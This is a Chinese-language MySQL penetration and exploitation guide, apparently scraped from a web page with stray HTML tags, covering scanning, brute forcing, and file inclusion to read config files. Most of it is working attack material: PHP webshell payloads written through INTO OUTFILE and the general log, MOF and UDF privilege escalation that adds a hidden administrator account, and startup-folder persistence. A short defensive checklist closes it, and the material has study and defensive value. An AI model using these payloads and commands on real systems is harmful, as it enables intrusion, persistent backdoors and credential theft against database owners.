MySQL数据库渗透及漏洞利用全面指南<\/h1>

1. MySQL信息收集<\/h2>

1.1 端口信息收集<\/h3>
MySQL默认端口：3306<\/li>
扫描工具：
IISputter：直接填写3306端口扫描<\/li>
Nmap：nmap -p 3306 192.168.1.1-254<\/code><\/li>
全端口扫描：nmap -p- 192.168.1.1<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
1.2 版本信息收集<\/h3>


使用Metasploit<\/strong>：<\/p>
use auxiliary\/scanner\/mysql\/mysql_version
<\/span><\/span>set rhosts 192.168.157.130
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>

MySQL查询<\/strong>：<\/p>
SELECT<\/span> @@<\/span>version<\/span>;
<\/span><\/span>SELECT<\/span> version<\/span>();
<\/span><\/span><\/code><\/pre><\/li>

使用SQLMap<\/strong>：<\/p>
sqlmap.py -u url --dbms mysql
<\/span><\/span><\/code><\/pre><\/li>

phpMyAdmin<\/strong>：

登录后查看localhost->变量->服务器变量和设置<\/code>中的version<\/code>参数值<\/p>
<\/li>
<\/ol>
1.3 数据库管理信息收集<\/h3>

常见管理工具：phpMyAdmin、Navicat for MySQL、MySQLFront<\/li>
配置文件可能包含数据库连接信息，如：

config.php<\/code><\/li>
web.config<\/code><\/li>
conn.asp<\/code><\/li>
db.php\/asp<\/code><\/li>
jdbc.properties<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
1.4 MSF信息收集模块<\/h3>


MySQL哈希值枚举<\/strong>：<\/p>
use auxiliary\/scanner\/mysql\/mysql_hashdump
<\/span><\/span>set username root
<\/span><\/span>set password root
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>

数据库枚举<\/strong>：<\/p>
use auxiliary\/admin\/mysql\/mysql_enum
<\/span><\/span>set username root
<\/span><\/span>set password root
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>

执行SQL语句<\/strong>：<\/p>
use auxiliary\/admin\/mysql\/mysql_sql
<\/span><\/span><\/code><\/pre><\/li>

导出数据库结构<\/strong>：<\/p>
use auxiliary\/scanner\/mysql\/mysql_schemadump
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. MySQL密码获取<\/h2>
2.1 暴力破解<\/h3>


网页在线破解<\/strong>：<\/p>

使用BurpSuite<\/li>
phpMyAdmin多线程批量破解工具<\/li>
<\/ul>
<\/li>

MSF暴力破解<\/strong>：<\/p>
use auxiliary\/scanner\/mysql\/mysql_login
<\/span><\/span>set RHOSTS 192.168.157.1-254
<\/span><\/span>set pass_file \/tmp\/password.txt
<\/span><\/span>set username root
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>

Nmap扫描破解<\/strong>：<\/p>
nmap --script=<\/span>mysql-brute 192.168.157.130
<\/span><\/span>nmap --script=<\/span>mysql-empty-password 192.168.195.130
<\/span><\/span><\/code><\/pre><\/li>

Hscan工具<\/strong>：

设置IP段、用户名字典和密码字典进行扫描<\/p>
<\/li>
<\/ol>
2.2 源代码泄露<\/h3>


网站备份文件<\/strong>：<\/p>

查找config.php<\/code>、web.config<\/code>等配置文件<\/li>
使用工具扫描.zip<\/code>、.rar<\/code>、.sql<\/code>等备份文件<\/li>
<\/ul>
<\/li>

配置备份文件<\/strong>：<\/p>

编辑器生成的.bak<\/code>文件<\/li>
版本控制文件如.git<\/code>、.svn<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
2.3 文件包含<\/h3>
通过本地文件包含漏洞读取数据库配置文件：<\/p>
<?<\/span>php<\/span> include<\/span>($_GET['file'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>访问：http:\/\/example.com\/vuln.php?file=..\/..\/config.php<\/code><\/p>
2.4 其他方式<\/h3>

网络嗅探工具如Cain<\/li>
客户端连接记录<\/li>
内存提取<\/li>
<\/ul>
3. MySQL获取Webshell<\/h2>
3.1 phpMyAdmin获取Webshell<\/h3>


直接导出后门<\/strong>：<\/p>
SELECT<\/span> '<?php @eval($_POST[antian365]);?>'<\/span> INTO<\/span> OUTFILE '\/var\/www\/html\/shell.php'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

通过表导出<\/strong>：<\/p>
CREATE<\/span> TABLE<\/span> `<\/span>mysql`<\/span>.`<\/span>antian365`<\/span> (`<\/span>temp`<\/span> TEXT NOTNULL<\/span>);
<\/span><\/span>INSERT<\/span> INTO<\/span> `<\/span>mysql`<\/span>.`<\/span>antian365`<\/span> (`<\/span>temp`<\/span>) VALUES<\/span>('<?php @eval($_POST[antian365]);?>'<\/span>);
<\/span><\/span>SELECT<\/span> `<\/span>temp`<\/span> FROM<\/span> `<\/span>antian365`<\/span> INTO<\/span> OUTFILE '\/var\/www\/html\/shell.php'<\/span>;
<\/span><\/span>DROP<\/span> TABLE<\/span> IF<\/span> EXISTS<\/span> `<\/span>antian365`<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

命令执行方式<\/strong>：<\/p>
SELECT<\/span> '<?php echo \'<\/span><<\/span>pre><\/span>\<\/span>';system($_GET[\'<\/span>cmd\<\/span>']); echo \'<\/span><\/<\/span>pre><\/span>\<\/span>';?>'<\/span> INTO<\/span> OUTFILE '\/var\/www\/html\/cmd.php'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

加密Webshell<\/strong>：<\/p>
SELECT<\/span> unhex('十六进制字符串'<\/span>) INTO<\/span> DUMPFILE '\/var\/www\/html\/shell.php'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

general_log_file方法<\/strong>：<\/p>
SET<\/span> global<\/span> general_log=<\/span>'on'<\/span>;
<\/span><\/span>SET<\/span> global<\/span> general_log_file=<\/span>'\/var\/www\/html\/shell.php'<\/span>;
<\/span><\/span>SELECT<\/span> '<?php $_GET["cmd"];?>'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 SQLMap获取Webshell<\/h3>
sqlmap -u url --os-shell
<\/span><\/span>echo "<?php @eval(<\/span>$_POST['c']);?>"<\/span> > \/data\/www\/1.php
<\/span><\/span><\/code><\/pre>4. MySQL提权技术<\/h2>
4.1 MOF提权<\/h3>


生成nullevt.mof文件<\/strong>：<\/p>
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin \/add\")";
};
instance of __FilterToConsumerBinding {
    Consumer = $Consumer;
    Filter = $EventFilter;
};
<\/code><\/pre>
<\/li>

导入MOF文件<\/strong>：<\/p>
SELECT<\/span> LOAD_FILE('C:\\RECYCLER\\nullevt.mof'<\/span>) INTO<\/span> DUMPFILE 'c:\/windows\/system32\/wbem\/mof\/nullevt.mof'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

MSF模块<\/strong>：<\/p>
use exploit\/windows\/mysql\/mysql_mof
<\/span><\/span>set rhost 192.168.157.1
<\/span><\/span>set rport 3306<\/span>
<\/span><\/span>set password root
<\/span><\/span>set username root
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 UDF提权<\/h3>


条件检查<\/strong>：<\/p>
SELECT<\/span> version<\/span>();  -- 获取版本
<\/span><\/span><\/span><\/span>SELECT<\/span> @@<\/span>basedir;  -- 安装目录
<\/span><\/span><\/span><\/span>SHOW<\/span> VARIABLES LIKE<\/span> '%plugin%'<\/span>;  -- 插件目录
<\/span><\/span><\/span><\/code><\/pre><\/li>

创建目录（MySQL 5.1+）<\/strong>：<\/p>
SELECT<\/span> 'It is dll'<\/span> INTO<\/span> DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION'<\/span>;
<\/span><\/span>SELECT<\/span> 'It is dll'<\/span> INTO<\/span> DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

导出DLL<\/strong>：<\/p>
SELECT<\/span> unhex('DLL十六进制'<\/span>) INTO<\/span> DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

创建函数<\/strong>：<\/p>
CREATE<\/span> FUNCTION<\/span> cmdshell RETURNS<\/span> STRING SONAME 'udf.dll'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

执行命令<\/strong>：<\/p>
SELECT<\/span> cmdshell('net user antian365 Password123! \/add'<\/span>);
<\/span><\/span>SELECT<\/span> cmdshell('net localgroup administrators antian365 \/add'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

清理痕迹<\/strong>：<\/p>
DROP<\/span> FUNCTION<\/span> cmdshell;
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.3 启动项提权<\/h3>


创建表并插入命令<\/strong>：<\/p>
CREATE<\/span> TABLE<\/span> a (cmd text);
<\/span><\/span>INSERT<\/span> INTO<\/span> a VALUES<\/span> ("net user antian365 Password123! \/add"<\/span>);
<\/span><\/span>INSERT<\/span> INTO<\/span> a VALUES<\/span> ("net localgroup administrators antian365 \/add"<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

导出到启动项<\/strong>：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> a INTO<\/span> OUTFILE 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.bat'<\/span>;
<\/span><\/span><\/code><\/pre><\/li>

MSF模块<\/strong>：<\/p>
use exploit\/windows\/mysql\/mysql_start_up
<\/span><\/span>set rhost 192.168.2.1
<\/span><\/span>set rport 3306<\/span>
<\/span><\/span>set username root
<\/span><\/span>set password 123456<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. MySQL密码破解<\/h2>
5.1 Cain工具破解<\/h3>

从user.MYD<\/code>文件中提取40位SHA1哈希<\/li>
使用Cain的Cracker模块添加哈希进行破解<\/li>
<\/ol>
5.2 在线破解<\/h3>

cmd5.com（收费）<\/li>
somd5.com（免费但有限制）<\/li>
<\/ul>
5.3 Hashcat破解<\/h3>
hashcat64.exe -m 200<\/span> mysql.hash pass.dict  # MySQL323<\/span>
<\/span><\/span>hashcat64.exe -m 300<\/span> mysql.hash pass.dict  # MySQL4.1\/5.x<\/span>
<\/span><\/span><\/code><\/pre>5.4 John the Ripper<\/h3>
echo "81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"<\/span> > hashes.txt
<\/span><\/span>john --format=<\/span>mysql-sha1 hashes.txt
<\/span><\/span><\/code><\/pre>6. 其他漏洞利用<\/h2>
6.1 MySQL身份认证漏洞（CVE-2012-2122）<\/h3>
use auxiliary\/scanner\/mysql\/mysql_authbypass_hashdump
<\/span><\/span><\/code><\/pre>6.2 MSF其他模块<\/h3>
use exploit\/windows\/mysql\/mysql_yassl_hello
<\/span><\/span>use exploit\/windows\/mysql\/scrutinizer_upload_exec
<\/span><\/span><\/code><\/pre>7. 防御建议<\/h2>


最小权限原则<\/strong>：<\/p>

为应用分配最小必要权限<\/li>
避免使用root账户连接<\/li>
<\/ul>
<\/li>

安全配置<\/strong>：<\/p>

设置secure-file-priv<\/code>限制文件导出<\/li>
禁用LOAD_FILE<\/code>和INTO OUTFILE<\/code>功能<\/li>
限制远程连接<\/li>
<\/ul>
<\/li>

密码安全<\/strong>：<\/p>

使用强密码策略<\/li>
定期更换密码<\/li>
避免密码重用<\/li>
<\/ul>
<\/li>

日志监控<\/strong>：<\/p>

启用MySQL审计日志<\/li>
监控异常查询行为<\/li>
<\/ul>
<\/li>

补丁更新<\/strong>：<\/p>

及时应用安全补丁<\/li>
升级到最新稳定版本<\/li>
<\/ul>
<\/li>

网络防护<\/strong>：<\/p>

防火墙限制3306端口访问<\/li>
使用VPN或SSH隧道访问<\/li>
<\/ul>
<\/li>

文件权限<\/strong>：<\/p>

限制插件目录写入权限<\/li>
检查启动项目录权限<\/li>
<\/ul>
<\/li>

安全审计<\/strong>：<\/p>

定期进行渗透测试<\/li>
检查UDF函数和存储过程<\/li>
<\/ul>
<\/li>
<\/ol>
通过以上全面的MySQL渗透测试技术，安全人员可以有效地评估MySQL数据库的安全性，同时管理员也可以根据这些技术加强数据库的安全防护。<\/p>